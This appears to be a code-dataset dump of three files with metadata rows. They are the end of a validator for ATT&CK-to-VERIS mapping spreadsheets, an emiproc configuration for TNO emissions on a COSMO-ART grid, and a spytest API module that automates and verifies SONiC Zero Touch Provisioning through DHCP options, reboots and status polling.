if attack_technique is numpy.nan:
# Don't validate the attack_technique if the cell is blank (aka is numpy.nan)
pass
elif attack_technique not in unique_per_veris_entry[veris_path]:
unique_per_veris_entry[veris_path].add(attack_technique)
else:
print(f"[-] In Sheet '{name}', under '{veris_path}', "
f"the technique ID '{attack_technique}' is duplicated")
fail_test = True
try:
axes, category, sub_category, veris_name = veris_path.split(".")
extracted_value = veris_enum[axes][category][sub_category][veris_name]
assert extracted_value
except (KeyError, ValueError):
print(f"[-] In Sheet '{name}', the VERIS path '{veris_path}' is invalid")
fail_test = True
assert fail_test is False
if __name__ == "__main__":
parser = get_argparse()
args = parser.parse_args()
print("[+] Starting Execution")
print(f"[+] Mappings Location: {args.spreadsheet_location}\t"
f"ATT&CK Version: {args.attack_version}\t"
f"VERIS Version: {args.veris_version}")
validate_json_mappings_metadata(
args.config_location, args.attack_version, args.veris_version, args.metadata_version
)
validate_json_mappings_metadata(
args.json_location, args.attack_version, args.veris_version, args.metadata_version
)
validate_spreadsheet_mappings_metadata(
args.spreadsheet_location, args.attack_version, args.veris_version, args.metadata_version
)
print("\t[+] Metadata Validation passed")
validate_mapping_entries(args.spreadsheet_location, args.attack_version)
print("\t[+] Mappings Validation passed")
print("[+] Finished Execution")
| 39.82716 | 117 | 0.646828 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,581 | 0.370014 |
33c5b1377d8bbccb253528d320f78fa3c49f64f2 | 2,015 | py | Python | cases/config_d1_tno_art.py | micstein89/cosmo-emission-processing | 7628b6354abb80c7c69b1f13ac3d1757f0455272 | [
"CC-BY-4.0"
] | null | null | null | cases/config_d1_tno_art.py | micstein89/cosmo-emission-processing | 7628b6354abb80c7c69b1f13ac3d1757f0455272 | [
"CC-BY-4.0"
] | null | null | null | cases/config_d1_tno_art.py | micstein89/cosmo-emission-processing | 7628b6354abb80c7c69b1f13ac3d1757f0455272 | [
"CC-BY-4.0"
] | null | null | null | # "constant" paths and values for TNO, regular lat/lon
# for MeteoTest Swiss inventory, use calculated regular domain in the code
import os
import time
from emiproc.grids import COSMOGrid, TNOGrid
# inventory
inventory = 'TNO'
# model either "cosmo-art" or "cosmo-ghg" (affects the output units)
model = 'cosmo-art'
# input filename
input_path = "/input/TNOMACC/CAMS-REG-AP_v2_2/CAMS-REG-AP_v2_2_1_emissions_year2015.nc"
# input grid
input_grid = TNOGrid(input_path)
# input species
species = ['co', 'nox', 'nmvoc', 'so2', 'nh3', 'pm10', 'pm2_5']
# input categories
categories = ["A", "B", "C", "D", "E", "F1","F2","F3","F4",
"G", "H", "I", "J", "K", "L" ]
# mapping from input to output species (input is used for missing keys)
in2out_species = {
'co': 'CO',
'nox': 'NOX',
'nmvoc': 'NMVOC',
'so2': 'SO2',
'nh3': 'NH3',
'pm10': 'PM10',
'pm2_5': 'PM25'
}
# mapping from input to output categories (input is used for missing keys)
in2out_category = {
'F1': 'F',
'F2': 'F',
'F3': 'F',
'F4': 'F'
}
# output variables are written in the following format using species and
# category after applying the mapping
varname_format = '{species}_{category}_{source_type}'
# output path and filename
output_path = os.path.join('oae-art-example', '{online}', 'tno')
output_name = 'tno-art.nc'
# Output grid is European domain (rotated pole coordinates)
cosmo_grid = COSMOGrid(
nx=192,
ny=164,
dx=0.12,
dy=0.12,
xmin=-16.08,
ymin=-9.54,
pollon=-170.0,
pollat=43.0,
)
# resolution of shapefile used for country mask
shpfile_resolution = "10m"
# number of processes
nprocs = 16
# metadata added as global attributes to netCDF output file
nc_metadata = {
"DESCRIPTION": "Gridded annual emissions",
"DATAORIGIN": "TNO-CAMS",
"CREATOR": "Qing Mu and Gerrit Kuhlmann",
"EMAIL": "gerrit.kuhlmann@empa.ch",
"AFFILIATION": "Empa Duebendorf, Switzerland",
"DATE CREATED": time.ctime(time.time()),
}
| 23.988095 | 87 | 0.649132 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,290 | 0.640199 |
33c69f7358ad122b465adeb2350740a2a675b997 | 45,876 | py | Python | spytest/apis/system/ztp.py | shubav/sonic-mgmt | 0ff71b907a55489bb4ed7d17b1682380fd459bf2 | [
"Apache-2.0"
] | 132 | 2016-10-19T12:34:44.000Z | 2022-03-16T09:00:39.000Z | spytest/apis/system/ztp.py | shubav/sonic-mgmt | 0ff71b907a55489bb4ed7d17b1682380fd459bf2 | [
"Apache-2.0"
] | 3,152 | 2016-09-21T23:05:58.000Z | 2022-03-31T23:29:08.000Z | spytest/apis/system/ztp.py | shubav/sonic-mgmt | 0ff71b907a55489bb4ed7d17b1682380fd459bf2 | [
"Apache-2.0"
] | 563 | 2016-09-20T01:00:15.000Z | 2022-03-31T22:43:54.000Z | # This file contains the list of API's for operations on ZTP
# @author : Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
from spytest import st
import apis.system.basic as basic_obj
import utilities.utils as utils_obj
import apis.system.switch_configuration as switch_conf_obj
import apis.system.interface as intf_obj
import apis.routing.ip as ip_obj
import apis.system.reboot as reboot_obj
import apis.system.boot_up as boot_up_obj
import datetime
wait_5 = 5
wait_10 = 10
wait_60 = 60
def show_ztp_status(dut, expect_reboot=False, cli_type=""):
"""
Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
API to show ztp status
:param dut:
:return:
"""
cli_type = st.get_ui_type(dut, cli_type=cli_type)
result = dict()
cli_type = "klish" if cli_type in ["rest-put", "rest-patch"] else cli_type
if cli_type not in ["click", "klish"]:
st.error("UNSUPPORTED CLI TYPE")
return result
command = "sudo ztp status" if cli_type == "click" else "show ztp-status"
output = st.show(dut, command, expect_reboot=False, type=cli_type)
file_name = dict()
timestamps = dict()
#excluded_file_name = ["--sonic-mgmt--#"]
if output:
for row in output:
result["filenames"] = list()
result["timestamps"] = list()
if result.get("service"):
pass
else:
result["service"] = row.get("service", "")
# if not result["source"]:
if result.get("source"):
pass
else:
result["source"] = row.get("source", "")
# if not result["status"]:
if result.get("status"):
pass
else:
result["status"] = row.get("status", "")
# if not result["adminmode"]:
if result.get("adminmode"):
pass
else:
result["adminmode"] = row.get("adminmode", "")
# if not result["timestamp"]:
result["timestamp"] = row.get("timestamp", "")
if row.get("filename"):
if cli_type == "click":
values = row["filename"].split(":")
file_name[values[0].strip()] = values[1].strip()
result["filenames"].append(file_name)
elif cli_type == "klish":
file_name[row.get("filename")] = row.get("filestatus")
result["filenames"].append(file_name)
if row.get("filetimestamp"):
timestamps.update({row.get("filename"):row.get("filetimestamp")})
result["timestamps"].append(timestamps)
# if not result["processingtext"]:
# result["processingtext"] = row["processingtext"] if "processingtext" in row and row["processingtext"] else ""
st.debug(result)
return result
def verify_ztp_config_section_from_status(dut, file_names=list(), status="SUCCESS", cli_type=""):
cli_type = st.get_ui_type(dut, cli_type=cli_type)
"""
Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
API to verify the config section
:param dut:
:param file_names:
:param status:
:return:
"""
is_found = 1
if file_names:
response = show_ztp_status(dut, cli_type=cli_type)
for file_name in file_names:
for names in response["filenames"]:
if names[file_name] != status:
is_found = 0
else:
is_found = 1
if not is_found:
return False
return True
def _verify_ztp_status_with_retry(dut, retry_cnt, cli_type=""):
cli_type = st.get_ui_type(dut, cli_type=cli_type)
"""
Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
API to verify ZTP status with retry value
:param dut:
:param retry_cnt:
:return:
"""
not_started_retry_cnt = 0
st.log("Verifying the ZTP status with retry method ...")
for _ in range(1, retry_cnt + 1):
response = show_ztp_status(dut, cli_type=cli_type)
if response["adminmode"] == "True":
st.log("Found that admin mode as {}".format(response["adminmode"]))
if response["service"] == "Inactive":
st.log("Found that service as {}".format(response["service"]))
if response["status"] == "FAILED":
st.log("Found that status as {}".format(response["status"]))
return False
elif response["status"] == "SUCCESS":
st.log("Found that status as {}".format(response["status"]))
return True
elif response["service"] == "Processing" or response["service"] == "Active Discovery":
st.log("Found that service as {}".format(response["service"]))
if response["status"] == "IN-PROGRESS":
st.log("Found that status as {}".format(response["status"]))
st.wait(3)
elif response["status"] == "FAILED":
st.log("Found that status as {}".format(response["status"]))
return False
elif response["status"] == "Not Started":
st.log("Found that status as {}".format(response["status"]))
not_started_retry_cnt += 1
if not_started_retry_cnt >= retry_cnt:
return False
st.wait(3)
else:
return True
elif response["service"] == "SUCCESS":
st.log("Found that service as {}".format(response["service"]))
return True
else:
st.log("Found that ZTP is disabled hence enabling it ..")
return False
return False
def poll_ztp_status(dut, status=["IN-PROGRESS", "Not Started"], iteration=40, retry=3, cli_type=""):
cli_type = st.get_ui_type(dut, cli_type=cli_type)
"""
API to poll the ztp status
Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
:param dut:
:param status:
:param iteration:
:param retry:
:return:
"""
i = 1
status = list([str(e) for e in status]) if isinstance(status, list) else [status]
while True:
response = show_ztp_status(dut, cli_type=cli_type)
if response["status"] in status:
st.log("Observed {} during polling ...".format(status))
return True
if i > iteration:
st.log("Max polling interval {} exceeded ...".format(i))
return False
i += 1
st.wait(retry)
# This function should be called with running ztp run command
def verify_ztp_status(dut, retry_cnt=0, iteration=300, retry=3, expect_reboot=False, reboot_on_success=list(), cli_type=""):
cli_type = st.get_ui_type(dut, cli_type=cli_type)
"""
Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
API to verify ZTP status
:param dut:
:param retry_cnt:
:return:
"""
retry_count_if_no_response = 0
if retry_cnt:
return _verify_ztp_status_with_retry(dut, retry_cnt, cli_type=cli_type)
else:
st.log("Verifying the ZTP status with iteration method ...")
for _ in range(1, iteration + 1):
response = show_ztp_status(dut, expect_reboot=expect_reboot, cli_type=cli_type)
if not response:
st.log("Observed no response in ZTP status ... retrying {} .. ".format(retry_count_if_no_response))
if retry_count_if_no_response > 5:
st.error("show ztp status returned empty data...")
return False
st.wait(retry)
retry_count_if_no_response += 1
continue
if "service" not in response or "status" not in response or "adminmode" not in response:
st.log("Values of service or status or adminmode is not populated yet, retrying ...")
st.wait(10)
continue
if response["adminmode"] == "True":
if "service" not in response or "status" not in response or "adminmode" not in response:
st.log("Values of service or status or adminmode is not populated yet, retrying ...")
st.wait(retry)
else:
# return verify_ztp_status(dut)
st.log("Found that admin mode as {}".format(response["adminmode"]))
if response["service"] == "Inactive":
st.log("Found that service as {}".format(response["service"]))
if response["status"] == "FAILED":
st.log("Found that status as {}".format(response["status"]))
return False
elif response["status"] == "SUCCESS":
st.log("Found that status as {}".format(response["status"]))
return True
else:
st.log("ZTP status is not in expected values , retrying...")
st.wait(retry)
# return verify_ztp_status(dut)
elif response["service"] == "Processing" or response["service"] == "Active Discovery":
st.log("Found that service as {}".format(response["service"]))
if response["status"] == "IN-PROGRESS":
st.log("Found that status as {}".format(response["status"]))
st.log("Files - {}".format(response["filenames"]))
if reboot_on_success and "filenames" in response and response["filenames"]:
reboot_flag = list(reboot_on_success) if isinstance(reboot_on_success, list) else [reboot_on_success]
if len(response["filenames"]) > 0:
filenames = response["filenames"][0]
for filename in reboot_flag:
if filename in filenames and filenames[filename] == "SUCCESS":
return True
if cli_type == "klish":
if len(response["filenames"]) > 0:
for key,value in response["filenames"][0].items():
if ("configdb-json" in key or "graphservice" in key) and value == "IN-PROGRESS":
st.wait(300)
st.wait(retry)
# return verify_ztp_status(dut)
elif response["status"] == "FAILED":
st.log("Found that status as {}".format(response["status"]))
return False
elif response["status"] == "Not Started":
st.log("Found that status as {}".format(response["status"]))
st.wait(retry)
# return verify_ztp_status(dut)
elif response["status"] == "SUCCESS":
st.log("Found that status as {}".format(response["status"]))
st.wait(retry)
# return verify_ztp_status(dut)
else:
st.log("ZTP status is not in expected values, retrying...")
st.wait(retry)
elif response["service"] == "SUCCESS":
st.log("Found that service as {}".format(response["service"]))
return True
else:
st.log("Found that ZTP is disabled hence enabling it ..")
ztp_operations(dut, "enable")
# ztp_operations(dut, "run")
# return verify_ztp_status(dut)
return False
def get_ztp_timestamp_obj(ztp_timestamp):
"""
Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
API to get ztp timestamp
:param ztp_timestamp:
:return:
"""
try:
return datetime.datetime.strptime(ztp_timestamp, '%Y-%m-%d %H:%M:%S')
except ValueError as e:
st.error(e)
def enable_ztp_if_disabled(dut, iteration=5, delay=1, cli_type=""):
cli_type = st.get_ui_type(dut, cli_type=cli_type)
"""
API to enable ztp if it is disabled, added check for enable in polling mechanism
Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
:param dut:
:param iteration:
:param delay:
:return:
"""
i = 1
while True:
response = show_ztp_status(dut, cli_type=cli_type)
if "adminmode" in response and response["adminmode"] != "True":
st.log("Enabling ZTP ...")
ztp_operations(dut, "enable")
break
if i > iteration:
st.log("ZTP admin mode not found after max iterations ...")
break
i += 1
st.wait(delay)
i = 1
while True:
response = show_ztp_status(dut, cli_type=cli_type)
if "adminmode" in response and response["adminmode"] == "True":
st.log("Admin mode enabled at {} iteration".format(i))
return True
if i > iteration:
st.log("Max iteration {} count reached ".format(i))
return False
i += 1
st.wait(delay)
def ztp_operations(dut, operation, cli_type="", max_time=0):
cli_type = st.get_ui_type(dut, cli_type=cli_type)
"""
Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
API to do ZTP operations
:param dut:
:param operation:
:return:
"""
if cli_type == "click":
supported_opers = ["run", "enable", "disable"]
if operation not in supported_opers:
return False
if operation in ["run", "disable"]:
command = "ztp {} -y".format(operation)
else:
command = "ztp {}".format(operation)
elif cli_type == "klish":
no_form = "no" if operation == "disable" else ""
command = "{} ztp enable".format(no_form)
st.config(dut, command, type=cli_type, max_time=max_time)
def ztp_push_full_config(dut, cli_type=""):
"""
NOT USED ANYWHERE
Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
APU to push full config
:param dut:
:return:
"""
cli_type = st.get_ui_type(dut, cli_type=cli_type)
config_dbjson = "config_db.json"
config_file = "ztp_data_local.json"
plugin_file_path = "/etc/sonic/ztp/{}".format(config_file)
source = "/tmp/{}".format(config_dbjson)
plugin_json = {config_dbjson: {"url": {"source": "file://{}".format(source),
"timeout": 300}, "save-config": "true"}}
file_path = basic_obj.write_to_json_file(plugin_json)
st.upload_file_to_dut(dut, file_path, plugin_file_path)
running_config = switch_conf_obj.get_running_config(dut)
file_path = basic_obj.write_to_json_file(running_config)
st.upload_file_to_dut(dut, file_path, source)
st.wait(wait_5)
ztp_operations(dut, "run")
st.wait(wait_60)
show_ztp_status(dut, cli_type=cli_type)
st.wait(wait_10)
show_ztp_status(dut, cli_type=cli_type)
def prepare_and_write_option_67_config_string(ssh_conn_obj, static_ip, config_path, config_file, dhcp_config_file, type="http"):
"""
NOT USED ANYWHERE
Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
Common function to write option 67 to DHCP server
:param ssh_conn_obj:
:param static_ip:
:param config_path:
:param config_file:
:param dhcp_config_file:
:param type:
:return:
"""
option_67_config = "option bootfile-name"
if type == "http":
config_json_url = "http://{}{}/{}".format(static_ip, config_path, config_file)
elif type == "tftp":
config_json_url = "tftp://{}/{}/{}".format(static_ip, config_path, config_file)
elif type == "ftp":
config_json_url = "ftp://{}/{}/{}".format(static_ip, config_path, config_file)
option_67_config_string = '{} "{}";'.format(option_67_config, config_json_url)
if not basic_obj.write_update_file(ssh_conn_obj, option_67_config,
option_67_config_string, dhcp_config_file):
st.log("Written content in file {} not found".format(dhcp_config_file))
st.report_fail("content_not_found")
def write_option_67_to_dhcp_server(ssh_conn_obj, data):
"""
NOT USER ANY WHERE
:param ssh_conn_obj:
:param data:
:return:
"""
option_67_config = "option bootfile-name"
if data.type == "http":
config_json_url = "http://{}{}/{}".format(data.static_ip, data.config_path, data.config_file)
elif data.type == "tftp":
config_json_url = "tftp://{}/{}/{}".format(data.static_ip, data.config_path, data.config_file)
elif data.type == "ftp":
config_json_url = "ftp://{}/{}/{}".format(data.static_ip, data.config_path, data.config_file)
option_67_config_string = '{} "{}";'.format(option_67_config, config_json_url)
if not basic_obj.write_update_file(ssh_conn_obj, option_67_config,
option_67_config_string, data.dhcp_config_file):
st.log("Written content in file {} not found".format(data.dhcp_config_file))
st.report_fail("content_not_found")
basic_obj.service_operations(ssh_conn_obj, data.dhcp_service_name, data.action, data.device)
if not verify_dhcpd_service_status(ssh_conn_obj, data.dhcpd_pid):
st.log("{} service not running".format(data.dhcp_service_name))
st.report_fail("service_not_running", data.dhcp_service_name)
def config_and_verify_dhcp_option(ssh_conn_obj, dut, ztp_params, data, expect_reboot=False, reboot_on_success=list(), cli_type=""):
"""
Common function to configure DHCP option along with status / logs verification
Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
:param ssh_conn_obj:
:param dut:
:param ztp_params:
:param data:
:return:
"""
cli_type = st.get_ui_type(dut,cli_type=cli_type)
cli_type = "klish" if cli_type in ["rest-put", "rest-patch"] else cli_type
retry_count = data.retry_count if "retry_count" in data and data.retry_count else 0
iteration = data.iteration if "iteration" in data and data.iteration else 300
delay = data.delay if "delay" in data and data.delay else 3
if "func_name" in data:
syslog_file_names = ["syslog_1_{}".format(data.func_name), "syslog_{}".format(data.func_name)]
# basic_obj.copy_config_db_to_temp(dut, data.config_db_path, data.config_db_temp)
if "config_file_type" in data and data.config_file_type == "text":
file_path = "/tmp/file_temp.json"
basic_obj.write_to_file(ssh_conn_obj, data.json_content, file_path, device="server")
elif "config_file_type" in data and data.config_file_type == "EoL":
file_path = ""
else:
file_path = basic_obj.write_to_json_file(data.json_content)
if file_path:
destination_path = "{}{}/{}".format(ztp_params.home_path, ztp_params.config_path, data.config_file)
basic_obj.copy_file_from_client_to_server(ssh_conn_obj, src_path=file_path, dst_path=destination_path)
if "config_db_location" in data and data.config_db_location == "json":
st.download_file_from_dut(dut, data.config_db_temp, file_path)
destination_path = "{}{}/{}".format(ztp_params.home_path, ztp_params.config_path, data.config_db_file_name)
basic_obj.copy_file_from_client_to_server(ssh_conn_obj, src_path=file_path, dst_path=destination_path)
if "scenario" in data and data.scenario == "invalid-json":
st.log("Writing invalid content to make invalid json ...")
basic_obj.write_to_file_to_line(ssh_conn_obj, ",", 5, destination_path, "server")
if data.option_type == "67":
st.log("Creating {} file on DHCP server ...".format(data.config_file))
data.search_pattern = r'\s*option\s+bootfile-name\s*\S*\s*"\S+";'
data.option_string = "option bootfile-name"
if data.type == "http":
data.option_url = "http://{}{}/{}".format(data.static_ip, data.config_path, data.config_file)
elif data.type == "tftp":
data.option_url = "tftp://{}/{}/{}".format(data.static_ip, data.config_path, data.config_file)
elif data.type == "ftp":
data.option_url = "ftp://{}/{}/{}".format(data.static_ip, data.config_path, data.config_file)
write_option_to_dhcp_server(ssh_conn_obj, data)
basic_obj.service_operations(ssh_conn_obj, data.dhcp_service_name, data.action, data.device)
if not verify_dhcpd_service_status(ssh_conn_obj, data.dhcpd_pid):
st.log("{} service not running".format(data.dhcp_service_name))
st.report_fail("service_not_running", data.dhcp_service_name)
# write_option_67_to_dhcp_server(ssh_conn_obj, data)
data.device_action = "reboot" if cli_type == "klish" else data.device_action
if data.device_action == "reboot":
reboot_type = data.reboot_type if "reboot_type" in data and data.reboot_type else "normal"
basic_obj.remove_file(dut, data.config_db_path)
st.reboot(dut, reboot_type, skip_port_wait=True)
st.wait_system_status(dut, 500)
elif data.device_action == "run":
ztp_operations(dut, data.device_action)
if "band_type" in data and data.band_type=="inband":
if not basic_obj.poll_for_system_status(dut):
st.log("Sytem is not ready ..")
st.report_env_fail("system_not_ready")
if not basic_obj.check_interface_status(dut, ztp_params.oob_port,"up"):
basic_obj.ifconfig_operation(dut, ztp_params.oob_port, "down")
interface_status = basic_obj.check_interface_status(dut, ztp_params.inband_port, "up")
if interface_status is not None:
if not interface_status:
intf_obj.interface_noshutdown(dut, ztp_params.inband_port, cli_type=cli_type)
if "service" in data and data.service == "disable":
basic_obj.service_operations_by_systemctl(dut, "ztp", "stop")
if basic_obj.verify_service_status(dut, "ztp"):
st.log("ZTP status is not stopped")
st.report_fail("service_not_stopped", "ztp")
basic_obj.service_operations_by_systemctl(dut, "ztp", "start")
if not poll_ztp_status(dut, ["IN-PROGRESS", "Not Started", "SUCCESS"], cli_type=cli_type):
st.report_fail("ztp_max_polling_interval")
if "check" in data and data.check == "not":
if verify_ztp_status(dut, retry_count, iteration, delay, cli_type=cli_type):
if "logs_path" in data and "func_name" in data:
capture_syslogs(dut, data.logs_path, syslog_file_names)
st.log("ZTP status verification failed")
st.report_fail("ztp_status_verification_failed")
else:
st.log("Iteration count {}".format(iteration))
st.log("REBOOT ON SUCCESS - {}".format(reboot_on_success))
if reboot_on_success:
if "configdb-json" in reboot_on_success:
st.wait_system_reboot(dut)
st.wait_system_status(dut, 300)
result = verify_ztp_status(dut, retry_count, iteration, delay, expect_reboot=expect_reboot, reboot_on_success=reboot_on_success, cli_type=cli_type)
else:
result = verify_ztp_status(dut, retry_count, iteration, delay, expect_reboot=expect_reboot, cli_type=cli_type)
if not result:
if "logs_path" in data and "func_name" in data:
capture_syslogs(dut, data.logs_path, syslog_file_names)
st.log("ZTP status verification failed")
st.report_fail("ztp_status_verification_failed")
if reboot_on_success:
output = show_ztp_status(dut, cli_type=cli_type)
if output["status"] != "SUCCESS":
st.wait(300, "Waiting for device to reboot after success...")
st.wait_system_status(dut, 300)
# st.wait_system_reboot(dut)
if not verify_ztp_status(dut, retry_count, iteration, delay, cli_type=cli_type):
if "logs_path" in data and "func_name" in data:
capture_syslogs(dut, data.logs_path, syslog_file_names)
st.log("ZTP status verification failed")
st.report_fail("ztp_status_verification_failed")
st.banner(boot_up_obj.sonic_installer_list(dut))
verify_ztp_filename_logs(dut, data)
if "ztp_log_string" in data and data.ztp_log_string:
if not basic_obj.poll_for_error_logs(dut, data.ztp_log_path, data.ztp_log_string):
st.log("ZTP log {} verification failed for message {}".format(data.ztp_log_path, data.ztp_log_string))
if not basic_obj.poll_for_error_logs(dut, data.ztp_log_path_1, data.ztp_log_string):
st.log("ZTP log {} verification failed for message {}".format(data.ztp_log_path_1, data.ztp_log_string))
st.report_fail("ztp_log_verification_failed", data.ztp_log_path_1, data.ztp_log_string)
if "result" in data and data.result == "pass":
st.report_pass("test_case_passed")
def write_option_239_to_dhcp_server(ssh_conn_obj, data):
st.log("##################### Writing option 239 to dhcp config file ... ##################")
option_239 = 'option provision-url ='
provisioning_script_path = "http://{}{}/{}".format(data["server_ip"], data["config_path"], data["provision_script"])
option_239_config = '{} "{}";'.format(option_239, provisioning_script_path)
option_67_config = "option bootfile-name"
basic_obj.write_update_file(ssh_conn_obj, option_67_config,
"##", data["dhcp_config_file"])
if not basic_obj.write_update_file(ssh_conn_obj, option_239,
option_239_config, data["dhcp_config_file"]):
st.log("Written content in file {} not found".format(data["dhcp_config_file"]))
st.report_fail("content_not_found")
def write_option_225_to_dhcp_server(ssh_conn_obj, data):
option_225 = "option option-225 ="
option_225_path = data["minigraph_path"]
option_225_config = '{} "{}";'.format(option_225, option_225_path)
option_67_config = "option bootfile-name"
option_239 = 'option provision-url ='
basic_obj.write_update_file(ssh_conn_obj, option_67_config,
"##", data["dhcp_config_file"])
basic_obj.write_update_file(ssh_conn_obj, option_239,
"##", data["dhcp_config_file"])
if not basic_obj.write_update_file(ssh_conn_obj, option_225,
option_225_config, data["dhcp_config_file"]):
st.log("Written content in file {} not found".format(data["dhcp_config_file"]))
st.report_fail("content_not_found")
def config_and_verify_option_225(ssh_conn_obj, dut, ztp_params, data, cli_type=""):
cli_type = st.get_ui_type(dut, cli_type=cli_type)
if data.option_type == "225":
if "func_name" in data:
syslog_file_names = ["syslog_1_{}".format(data.func_name), "syslog_{}".format(data.func_name)]
data.search_pattern = r'\s*option option-225\s*\S*\s*"\S+";'
data.option_string = "option option-225 " # "option dhcp6.boot-file-url "
data.option_url = data.minigraph_path
data.option_type = "option_67"
clear_options_from_dhcp_server(ssh_conn_obj, data)
data.option_type = "option_239"
clear_options_from_dhcp_server(ssh_conn_obj, data)
write_option_to_dhcp_server(ssh_conn_obj, data)
# write_option_225_to_dhcp_server(ssh_conn_obj, data)
basic_obj.service_operations(ssh_conn_obj, data.dhcp_service_name, data.action, data.device)
if not verify_dhcpd_service_status(ssh_conn_obj, data.dhcpd_pid):
st.log("{} service not running".format(data.dhcp_service_name))
st.report_fail("service_not_running", data.dhcp_service_name)
data.device_action = "reboot" if cli_type == "klish" else data.device_action
if data.device_action == "reboot":
reboot_type = data.reboot_type if "reboot_type" in data and data.reboot_type else "normal"
basic_obj.remove_file(dut, data.config_db_path)
st.reboot(dut, reboot_type, skip_port_wait=True)
st.wait_system_status(dut, 400)
elif data.device_action == "run":
ztp_operations(dut, data.device_action)
if not verify_ztp_status(dut, cli_type=cli_type):
if "logs_path" in data and "func_name" in data:
capture_syslogs(dut, data.logs_path, syslog_file_names)
st.log("ZTP status verification failed")
st.report_fail("ztp_status_verification_failed")
verify_ztp_filename_logs(dut, data)
if "ztp_log_string" in data and data.ztp_log_string:
if not basic_obj.poll_for_error_logs(dut, data.ztp_log_path, data.ztp_log_string):
st.log("ZTP log {} verification failed for message {}".format(data.ztp_log_path, data.ztp_log_string))
if not basic_obj.poll_for_error_logs(dut, data.ztp_log_path_1, data.ztp_log_string):
st.log("ZTP log {} verification failed for message {}".format(data.ztp_log_path_1,
data.ztp_log_string))
st.report_fail("ztp_log_verification_failed", data.ztp_log_path_1, data.ztp_log_string)
def verify_ztp_attributes(dut, property, value, cli_type=""):
cli_type = st.get_ui_type(dut, cli_type=cli_type)
"""
This is to verify the ztp attributes with the provided value
Author: Chaitanya Vella (chaitanya.vella-kumar@broadcom.com)
:param dut: dut object
:param property: status, service, adminmode, filenames, timestamp, source
:param value: This is string except filenames, for file names {'03-test-plugin': 'Not Started', '02-test-plugin':
'Not Started', 'configdb-json': 'Not Started'}
:return: boolean
"""
response = show_ztp_status(dut, cli_type=cli_type)
if not response:
return False
if property in response:
if property == "filenames":
filenames = response["filenames"][0]
for filename, status in filenames:
if value[filename] != status:
return False
else:
if response[property] != value:
return False
else:
return False
return True
def verify_ztp_filename_logs(dut, data, status="SUCCESS", condition="positive"):
"""
Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
API to verify logs
:param dut:
:param data:
:param status:
:return:
"""
filenames = list([str(e) for e in data.file_names]) if isinstance(data.file_names, list) else [data.file_names]
log_msg = data.log_msg if "log_msg" in data and data.log_msg else "Checking configuration section {} result: {}"
match = data.match if "match" in data else ""
for file_name in filenames:
log_string_1 = log_msg.format(file_name, status)
st.log(log_string_1)
if not basic_obj.poll_for_error_logs(dut, data.ztp_log_path, log_string_1, match=match):
if condition == "positive":
st.log("ZTP log {} verification failed for message {}".format(data.ztp_log_path, log_string_1))
if not basic_obj.poll_for_error_logs(dut, data.ztp_log_path_1, log_string_1, match=match):
st.log("ZTP log {} verification failed for message {}".format(data.ztp_log_path_1,
log_string_1))
st.report_fail("ztp_log_verification_failed", data.ztp_log_path_1, log_string_1)
else:
return True
else:
return True
def config_ztp_backdoor_options(dut, ztp_cfg={"admin-mode": True, "restart-ztp-interval": 30}, dut_ztp_cfg_file="/host/ztp/ztp_cfg.json"):
"""
Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
Function to enable backward options for ZTP
:param dut:
:param ztp_cfg:
:param dut_ztp_cfg_file:
:return:
"""
ztp_cfg_file = basic_obj.write_to_json_file(ztp_cfg)
st.upload_file_to_dut(dut, ztp_cfg_file, dut_ztp_cfg_file)
def ztp_status_verbose(dut, cli_type=""):
cli_type = st.get_ui_type(dut, cli_type=cli_type)
"""
API to get the ztp status verbose output with filename and its details as we are getting the status in ztp status API
Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
:param dut:
:return:
"""
command = "sudo ztp status -v" if cli_type == "click" else "show ztp-status"
if cli_type == "click":
return st.show(dut, command, type=cli_type)
else:
return show_ztp_status(dut, cli_type=cli_type)
def verify_plugin_chronological_order(dut, cli_type=""):
cli_type = st.get_ui_type(dut, cli_type=cli_type)
"""
API to verify the plugin chronological order of ztp status
Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
:param dut:
:return:
"""
st.log("Verifying timestamp for chronological order ... ")
output = ztp_status_verbose(dut, cli_type=cli_type)
data = list()
if cli_type == "click":
for val in output:
data.append(val["filetimestamp"])
else:
for val in output["timestamps"]:
for _, timestamp in val.items():
data.append(timestamp)
data.sort()
for i, _ in enumerate(data):
if i + 1 < len(data):
result = utils_obj.date_time_delta(data[i], data[i + 1], True)
st.log(result)
if result[0] < 0 or result[1] < 0:
st.log("Observed timestamp difference is not as expected ...")
return False
return True
def verify_dhclient_on_interface(dut, search_string, interface, expected_count=2):
"""
API to verify DHCLIENT on provided interface using ps aux command
Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
:param dut:
:param search_string:
:param interface:
:param expected_count:
:return:
"""
st.log("Verifying dhclient for {} interface".format(interface))
ps_aux = basic_obj.get_ps_aux(dut, search_string)
# if len(ps_aux) != expected_count:
st.log("Observed {} DHCLIENT entries on {} interface".format(len(ps_aux), interface))
# return False
dhclient_str = "/run/dhclient.{}.pid".format(interface)
if not ps_aux:
st.error("DHCLIENT process not found on DUT ...")
return False
for entry in ps_aux:
if dhclient_str in entry["command"]:
st.log("Required dhclient is found ...")
return True
return False
def create_required_folders(conn_obj, path_list):
"""
API to create folders as per the provided path in bulk
:param dut:
:param path:
:return:
"""
path_list = [path_list] if type(path_list) is str else list([str(e) for e in path_list])
for path in path_list:
basic_obj.make_dir(conn_obj, path, "server")
basic_obj.change_permissions(conn_obj, path, 777, "server")
def config_dhcpv6_options(ssh_conn_obj, ztp_params, config_params, options=dict(), cli_type=""):
"""
Common function to configure dhcpv6 options and verify the result on both inband and out of band interfaces
